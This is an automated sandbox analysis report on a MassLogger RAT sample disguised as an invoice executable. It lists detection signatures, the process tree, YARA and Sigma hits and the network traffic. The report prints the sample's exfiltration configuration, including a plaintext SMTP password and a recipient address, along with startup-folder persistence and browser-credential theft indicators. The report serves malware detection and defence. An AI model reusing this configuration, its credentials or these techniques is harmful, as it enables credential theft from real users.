Edit tour

Windows Analysis Report
fatura098002.exe

Overview

General Information

Sample name:	fatura098002.exe
Analysis ID:	1585877
MD5:	d029e152dee67016ff65ad19dbeed64b
SHA1:	a3f1580a6448956ad15f970b5afdc081f0fa1edf
SHA256:	6c7a1e93abd57844906bef4c7374ba4ab8df35208dfac4e5a01886d9e86c1986
Tags:	exeuser-adrian__luca
Infos:

Detection

MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected MassLogger RAT

Yara detected Telegram RAT

.NET source code references suspicious native API functions

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Contains functionality to log keystrokes (.Net Source)

Drops VBS files to the startup folder

Found API chain indicative of sandbox detection

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

fatura098002.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\fatura098002.exe" MD5: D029E152DEE67016FF65AD19DBEED64B)

gehlenite.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\fatura098002.exe" MD5: D029E152DEE67016FF65AD19DBEED64B)

RegSvcs.exe (PID: 7624 cmdline: "C:\Users\user\Desktop\fatura098002.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 7780 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gehlenite.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

gehlenite.exe (PID: 7840 cmdline: "C:\Users\user\AppData\Local\Halitherses\gehlenite.exe" MD5: D029E152DEE67016FF65AD19DBEED64B)

RegSvcs.exe (PID: 7860 cmdline: "C:\Users\user\AppData\Local\Halitherses\gehlenite.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Server": "daipro.com.mx", "To": "saleseuropower2@yandex.com", "Port": 587}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2652141073.0000000000414000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1a7:$a1: get_encryptedPassword 0xf4cf:$a2: get_encryptedUsername 0xef42:$a3: get_timePasswordChanged 0xf063:$a4: get_passwordField 0xf1bd:$a5: set_encryptedPassword 0x10b19:$a7: get_logins 0x107ca:$a8: GetOutlookPasswords 0x105bc:$a9: StartKeylogger 0x10a69:$a10: KeyLoggerEventArgs 0x10619:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14165:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13663:$a3: \Google\Chrome\User Data\Default\Login Data 0x13971:$a4: \Orbitum\User Data\Default\Login Data 0x14769:$a5: \Kometa\User Data\Default\Login Data
00000006.00000002.2653419827.0000000002B86000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1a7:$a1: get_encryptedPassword 0xf4cf:$a2: get_encryptedUsername 0xef42:$a3: get_timePasswordChanged 0xf063:$a4: get_passwordField 0xf1bd:$a5: set_encryptedPassword 0x10b19:$a7: get_logins 0x107ca:$a8: GetOutlookPasswords 0x105bc:$a9: StartKeylogger 0x10a69:$a10: KeyLoggerEventArgs 0x10619:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14165:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13663:$a3: \Google\Chrome\User Data\Default\Login Data 0x13971:$a4: \Orbitum\User Data\Default\Login Data 0x14769:$a5: \Kometa\User Data\Default\Login Data
00000003.00000002.2653936618.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2652141073.0000000000403000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.2652141073.0000000000403000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xdfa7:$a1: get_encryptedPassword 0xe2cf:$a2: get_encryptedUsername 0xdd42:$a3: get_timePasswordChanged 0xde63:$a4: get_passwordField 0xdfbd:$a5: set_encryptedPassword 0xf919:$a7: get_logins 0xf5ca:$a8: GetOutlookPasswords 0xf3bc:$a9: StartKeylogger 0xf869:$a10: KeyLoggerEventArgs 0xf419:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: gehlenite.exe PID: 7584	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: gehlenite.exe PID: 7584	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: gehlenite.exe PID: 7584	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: gehlenite.exe PID: 7584	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x24733b:$a1: get_encryptedPassword 0x247654:$a2: get_encryptedUsername 0x2470ea:$a3: get_timePasswordChanged 0x24720b:$a4: get_passwordField 0x247351:$a5: set_encryptedPassword 0x248c54:$a7: get_logins 0x248905:$a8: GetOutlookPasswords 0x2486f7:$a9: StartKeylogger 0x248ba4:$a10: KeyLoggerEventArgs 0x248754:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 7624	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7624	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7624	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3b602:$a1: get_encryptedPassword 0x3b91b:$a2: get_encryptedUsername 0x3b3b1:$a3: get_timePasswordChanged 0x3b4d2:$a4: get_passwordField 0x3b618:$a5: set_encryptedPassword 0x3cf1b:$a7: get_logins 0x3cbcc:$a8: GetOutlookPasswords 0x3c9be:$a9: StartKeylogger 0x3ce6b:$a10: KeyLoggerEventArgs 0x3ca1b:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: gehlenite.exe PID: 7840	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: gehlenite.exe PID: 7840	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: gehlenite.exe PID: 7840	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: gehlenite.exe PID: 7840	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x170604:$a1: get_encryptedPassword 0x17091d:$a2: get_encryptedUsername 0x1703b3:$a3: get_timePasswordChanged 0x1704d4:$a4: get_passwordField 0x17061a:$a5: set_encryptedPassword 0x171f1d:$a7: get_logins 0x171bce:$a8: GetOutlookPasswords 0x1719c0:$a9: StartKeylogger 0x171e6d:$a10: KeyLoggerEventArgs 0x171a1d:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 7860	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7860	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1a7:$a1: get_encryptedPassword 0xf4cf:$a2: get_encryptedUsername 0xef42:$a3: get_timePasswordChanged 0xf063:$a4: get_passwordField 0xf1bd:$a5: set_encryptedPassword 0x10b19:$a7: get_logins 0x107ca:$a8: GetOutlookPasswords 0x105bc:$a9: StartKeylogger 0x10a69:$a10: KeyLoggerEventArgs 0x10619:$a11: KeyLoggerEventArgsEventHandler
3.2.RegSvcs.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14165:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13663:$a3: \Google\Chrome\User Data\Default\Login Data 0x13971:$a4: \Orbitum\User Data\Default\Login Data 0x14769:$a5: \Kometa\User Data\Default\Login Data
2.2.gehlenite.exe.1b80000.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.gehlenite.exe.1b80000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.gehlenite.exe.1b80000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.gehlenite.exe.1b80000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1a7:$a1: get_encryptedPassword 0xf4cf:$a2: get_encryptedUsername 0xef42:$a3: get_timePasswordChanged 0xf063:$a4: get_passwordField 0xf1bd:$a5: set_encryptedPassword 0x10b19:$a7: get_logins 0x107ca:$a8: GetOutlookPasswords 0x105bc:$a9: StartKeylogger 0x10a69:$a10: KeyLoggerEventArgs 0x10619:$a11: KeyLoggerEventArgsEventHandler
2.2.gehlenite.exe.1b80000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14165:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13663:$a3: \Google\Chrome\User Data\Default\Login Data 0x13971:$a4: \Orbitum\User Data\Default\Login Data 0x14769:$a5: \Kometa\User Data\Default\Login Data
5.2.gehlenite.exe.5a0000.0.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.gehlenite.exe.5a0000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.gehlenite.exe.5a0000.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.gehlenite.exe.5a0000.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1a7:$a1: get_encryptedPassword 0xf4cf:$a2: get_encryptedUsername 0xef42:$a3: get_timePasswordChanged 0xf063:$a4: get_passwordField 0xf1bd:$a5: set_encryptedPassword 0x10b19:$a7: get_logins 0x107ca:$a8: GetOutlookPasswords 0x105bc:$a9: StartKeylogger 0x10a69:$a10: KeyLoggerEventArgs 0x10619:$a11: KeyLoggerEventArgsEventHandler
5.2.gehlenite.exe.5a0000.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14165:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13663:$a3: \Google\Chrome\User Data\Default\Login Data 0x13971:$a4: \Orbitum\User Data\Default\Login Data 0x14769:$a5: \Kometa\User Data\Default\Login Data
2.2.gehlenite.exe.1b80000.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.gehlenite.exe.1b80000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.gehlenite.exe.1b80000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.gehlenite.exe.1b80000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3a7:$a1: get_encryptedPassword 0xd6cf:$a2: get_encryptedUsername 0xd142:$a3: get_timePasswordChanged 0xd263:$a4: get_passwordField 0xd3bd:$a5: set_encryptedPassword 0xed19:$a7: get_logins 0xe9ca:$a8: GetOutlookPasswords 0xe7bc:$a9: StartKeylogger 0xec69:$a10: KeyLoggerEventArgs 0xe819:$a11: KeyLoggerEventArgsEventHandler
2.2.gehlenite.exe.1b80000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12365:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11863:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b71:$a4: \Orbitum\User Data\Default\Login Data 0x12969:$a5: \Kometa\User Data\Default\Login Data
5.2.gehlenite.exe.5a0000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.gehlenite.exe.5a0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.gehlenite.exe.5a0000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.gehlenite.exe.5a0000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3a7:$a1: get_encryptedPassword 0xd6cf:$a2: get_encryptedUsername 0xd142:$a3: get_timePasswordChanged 0xd263:$a4: get_passwordField 0xd3bd:$a5: set_encryptedPassword 0xed19:$a7: get_logins 0xe9ca:$a8: GetOutlookPasswords 0xe7bc:$a9: StartKeylogger 0xec69:$a10: KeyLoggerEventArgs 0xe819:$a11: KeyLoggerEventArgsEventHandler
5.2.gehlenite.exe.5a0000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12365:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11863:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b71:$a4: \Orbitum\User Data\Default\Login Data 0x12969:$a5: \Kometa\User Data\Default\Login Data
Click to see the 19 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gehlenite.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gehlenite.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gehlenite.vbs" , ProcessId: 7780, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gehlenite.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gehlenite.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gehlenite.vbs" , ProcessId: 7780, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe, ProcessId: 7584, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gehlenite.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T12:30:39.139186+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49702	132.226.247.73	80	TCP
2025-01-08T12:30:50.248524+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49704	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 5.2.gehlenite.exe.5a0000.0.raw.unpack

Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Server": "daipro.com.mx", "To": "saleseuropower2@yandex.com", "Port": 587}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Virustotal: Detection: 54%			Perma Link

Multi AV Scanner detection for submitted file

Source: fatura098002.exe	Virustotal: Detection: 54%			Perma Link
Source: fatura098002.exe	ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: fatura098002.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: fatura098002.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.11:49703 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.11:49705 version: TLS 1.0

Source:	Binary string: wntdll.pdbUGP source: gehlenite.exe, 00000002.00000003.1429734158.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, gehlenite.exe, 00000002.00000003.1430483738.0000000003840000.00000004.00001000.00020000.00000000.sdmp, gehlenite.exe, 00000005.00000003.1556729477.0000000003590000.00000004.00001000.00020000.00000000.sdmp, gehlenite.exe, 00000005.00000003.1554686098.00000000033F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: gehlenite.exe, 00000002.00000003.1429734158.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, gehlenite.exe, 00000002.00000003.1430483738.0000000003840000.00000004.00001000.00020000.00000000.sdmp, gehlenite.exe, 00000005.00000003.1556729477.0000000003590000.00000004.00001000.00020000.00000000.sdmp, gehlenite.exe, 00000005.00000003.1554686098.00000000033F0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0073C2A2 FindFirstFileExW,	0_2_0073C2A2
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_007768EE FindFirstFileW,FindClose,	0_2_007768EE
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0077698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0077698F
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0076D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0076D076
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0076D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0076D3A9
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00779642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00779642
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0077979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0077979D
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00779B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00779B2B
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0076DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0076DBBE
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00775C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00775C97
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_0067C2A2 FindFirstFileExW,	2_2_0067C2A2
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006B68EE FindFirstFileW,FindClose,	2_2_006B68EE
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_006B698F
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_006AD076
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_006AD3A9
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_006B9642
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_006B979D
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_006B9B2B
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_006ADBBE
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006B5C97 FindFirstFileW,FindNextFileW,FindClose,	2_2_006B5C97

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 028B9731h	3_2_028B9480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 028B9E5Ah	3_2_028B9A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 028B9E5Ah	3_2_028B9A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 028B9E5Ah	3_2_028B9D87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00F99731h	6_2_00F99480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00F99E5Ah	6_2_00F99A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00F99E5Ah	6_2_00F99D87

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49704 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49702 -> 132.226.247.73:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.11:49703 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.11:49705 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_0077CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0077CE44

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
